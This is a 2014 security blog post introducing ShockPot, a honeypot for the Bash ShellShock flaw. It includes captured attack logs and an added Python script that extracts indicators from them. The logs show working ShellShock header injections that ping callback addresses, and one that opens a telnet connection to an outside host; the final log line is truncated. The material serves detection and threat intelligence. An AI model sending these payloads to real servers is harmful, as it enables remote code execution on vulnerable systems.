September 25, 2014 - Greg Martin

Introducing ShockPot: The intelligence driven defense against ShellShock

<p>While the security community is still recovering from Heartbleed, disclosed this past April, here comes another game-changing vulnerability: <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271">ShellShock</a>. The bug is simple but severe: it sits in Bash, one of the most widely deployed command-line shells, and puts millions of systems at risk of local and remote code execution.</p><p>As of this morning there were already several reports of malware spreading by exploiting ShellShock. As time passes, expect widespread exploitation and a string of attacks ranging from underground cyber criminals to potentially nation-state backed actors. Many organizations are now scrambling to understand how to detect, identify, and protect against ShellShock attacks. So far a few network security vendors have released early information, such as these <a href="http://www.volexity.com/blog/?p=19">Snort and Suricata signatures</a>. One approach not yet introduced, however, is an "active-defense" tool that counters ShellShock by turning the attackers' own tactics against them.</p><p>In cyber security, using intelligence against an attacker is a well-tested and highly successful technique. We believe the strongest intelligence comes from giving organizations the ability to monitor attempts against their own networks locally: visibility into attacks on your own network produces the most relevant intelligence for defense. This is why we released our popular open source honeypot management platform, <a href="http://threatstream.github.io/mhn">Modern Honey Network (MHN)</a>. We are pleased to announce that today we are releasing the first ShellShock honeypot, ShockPot, with full integration into the Modern Honey Network!
Get it here: <a href="https://github.com/threatstream/mhn">https://github.com/threatstream/mhn</a></p><p>If you have not run MHN before, it is very simple to use and lets you easily deploy highly effective honeypots that generate a range of relevant threat intelligence from your own systems. If you want to get ShockPot up and running quickly as a standalone honeypot for testing, you can do that too; just download it from our repository here: <a href="http://github.com/threatstream/shockpot">http://github.com/threatstream/shockpot</a>.</p><p><strong>ShockPot</strong></p><p>ShockPot is a web application honeypot created by ThreatStream Labs to catch attackers attempting to exploit the Bash remote code execution vulnerability ShellShock (<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271">CVE-2014-6271</a>). By default it logs every HTTP request received on port 80, detects ShellShock attempts, and records the injected exploit code and any scripts the attacker delivers. It is easy to extract the URLs and files from ShockPot's logs and submit them to <a href="http://www.virustotal.com/">VirusTotal</a> or <a href="https://www.anomali.com/products">ThreatStream Optic</a>.</p><p>Here are sample logs the honeypot picked up in the past 24 hours (the sensor's public IP is masked). Note how the attackers place the "() { :; };" Bash function prefix in whichever headers a CGI script will export as environment variables (User-Agent, Cookie, Host, Referer), and how the early probes simply ping a callback address to confirm that the injected command executed:</p>
<h5>{"remote": ["209.126.230.72", 57655], "data_type": "http", "timestamp": "2014-09-25T02:17:02.510100", "public_ip": "xxx.81.215.xxx", "data": {"request": "('/', ['User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)\r\n', 'Accept: */*\r\n', 'Cookie: () { :; }; ping -c 17 209.126.230.74\r\n', 'Host:() { :; }; ping -c 23 209.126.230.74\r\n', 'Referer: () { :; }; ping -c 11 209.126.230.74\r\n'], None)", "response": "302"}, "id": "621413ca-dd77-4f7d-a6c8-5a430b6d683d"}</h5>
<h5>{"remote": ["209.126.230.72", 57655], "data_type": "http", "timestamp": "2014-09-25T04:46:48.443125", "public_ip": "xxx.226.249.xxx", "data": {"request": "('/', ['User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)\r\n', 'Accept: */*\r\n', 'Cookie: () { :; }; ping -c 17 209.126.230.74\r\n', 'Host:() { :; }; ping -c 23 209.126.230.74\r\n', 'Referer: () { :; }; ping -c 11 209.126.230.74\r\n'], None)", "response": "302"}, "id": "f4e21a20-4a9b-4c07-8e18-89330534206a"}</h5>
<h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T08:38:10.363830", "public_ip": "xxx.199.235.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "567a5121-9484-483f-ad02-c358cbedf5a1"}</h5>
<h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T10:50:26.797778", "public_ip": "xxx.226.249.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "468ea6f4-609f-471a-9bfc-147fdf1b0848"}</h5>
<h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T11:31:01.423837", "public_ip": "xxx.241.155.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "41004bef-159b-4903-a83c-c465029eccf3"}</h5>
<h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T12:12:38.297289", "public_ip": "xxx.81.215.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "dae909f5-0c0f-480a-bcfc-454527788eea"}</h5>
<h5>{"remote": ["114.91.107.58", 39475], "data_type": "http", "timestamp": "2014-09-25T16:53:43.335534", "public_ip": "xxx.241.155.xxx", "data": {"request": "('/', ['Host: xxx.241.155.xxx\r\n', 'Accept: */*\r\n', 'User-Agent: () { :;}; /bin/bash -c "telnet 197.242.148.29 9999""\r\n']</h5>
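<p>As an added example (not part of the original post and not ShockPot project code), the script below shows the extraction step the post describes: it reads ShockPot's JSON events, decodes the logged request, flags every header carrying the ShellShock function prefix, and pulls out the callback IP addresses and URLs that you would submit to VirusTotal or ThreatStream Optic. The two sample events are copied from the logs above; the regular expressions and function names are my own, and the code assumes the "request" field is the repr() of a (path, header_lines, body) tuple, as it appears in those logs.</p>

```python
"""Pull ShellShock (CVE-2014-6271) indicators out of ShockPot JSON log events.

Added example, not ShockPot project code. Assumes the "request" field is the
repr() of a (path, header_lines, body) tuple, as in the sample logs above.
"""
import ast
import json
import re

# A Bash function export is "() { <body> };"; anything after the "};" is the
# command Bash would run, i.e. the attacker's payload.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<payload>.*)", re.S)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")

# Two events copied from the sample logs in this post (sensor IP masked as there).
SAMPLE_EVENTS = [
    r'''{"remote": ["209.126.230.72", 57655], "data_type": "http", "timestamp": "2014-09-25T02:17:02.510100", "public_ip": "xxx.81.215.xxx", "data": {"request": "('/', ['User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)\\r\\n', 'Accept: */*\\r\\n', 'Cookie: () { :; }; ping -c 17 209.126.230.74\\r\\n', 'Host:() { :; }; ping -c 23 209.126.230.74\\r\\n', 'Referer: () { :; }; ping -c 11 209.126.230.74\\r\\n'], None)", "response": "302"}, "id": "621413ca-dd77-4f7d-a6c8-5a430b6d683d"}''',
    r'''{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T08:38:10.363830", "public_ip": "xxx.199.235.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\\r\\n', 'Accept: */*\\r\\n'], None)", "response": "404"}, "id": "567a5121-9484-483f-ad02-c358cbedf5a1"}''',
]


def parse_request(request_repr):
    """Decode the "request" field into (path, [(header, value), ...], body).

    Some exports carry the header CR/LF as literal control characters instead
    of the \\r\\n escapes repr() writes; re-escape them so ast.literal_eval
    accepts both forms. Headers are kept as a list so repeated names survive.
    """
    safe = request_repr.replace("\r", "\\r").replace("\n", "\\n")
    path, header_lines, body = ast.literal_eval(safe)
    headers = []
    for line in header_lines:
        # Split on the first colon only: the payload itself contains colons.
        name, _, value = line.rstrip("\r\n").partition(":")
        headers.append((name.strip(), value.strip()))
    return path, headers, body


def find_shellshock(headers):
    """Return [(header_name, payload)] for every header carrying a ShellShock probe."""
    hits = []
    for name, value in headers:
        match = SHELLSHOCK_RE.search(value)
        if match:
            hits.append((name, match.group("payload").strip()))
    return hits


def extract_iocs(event_json):
    """Summarise one ShockPot event: is it ShellShock, and what did it try to reach?"""
    event = json.loads(event_json)
    path, headers, _body = parse_request(event["data"]["request"])
    hits = find_shellshock(headers)
    # Callback hosts are taken only from the injected commands, so the
    # scanner's own source address is not mistaken for an IOC.
    callback_ips = sorted({ip for _, payload in hits for ip in IPV4_RE.findall(payload)})
    urls = sorted({url for _, value in headers for url in URL_RE.findall(value)})
    return {
        "id": event["id"],
        "source_ip": event["remote"][0],
        "path": path,
        "shellshock": bool(hits),
        "hits": hits,
        "callback_ips": callback_ips,
        "urls": urls,
    }


if __name__ == "__main__":
    for raw in SAMPLE_EVENTS:
        print(json.dumps(extract_iocs(raw), indent=2))
```

<p>Run against the first sample event this reports three hits (Cookie, Host, Referer), one callback address (209.126.230.74, distinct from the scanning host 209.126.230.72), and the erratasec URL the scanner advertises in its User-Agent; the cgi-sys probe yields a single User-Agent hit with 198.101.206.138 as its callback. Because the match key is the function prefix rather than any particular command, the same check catches later payloads that fetch and run a script instead of pinging.</p>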
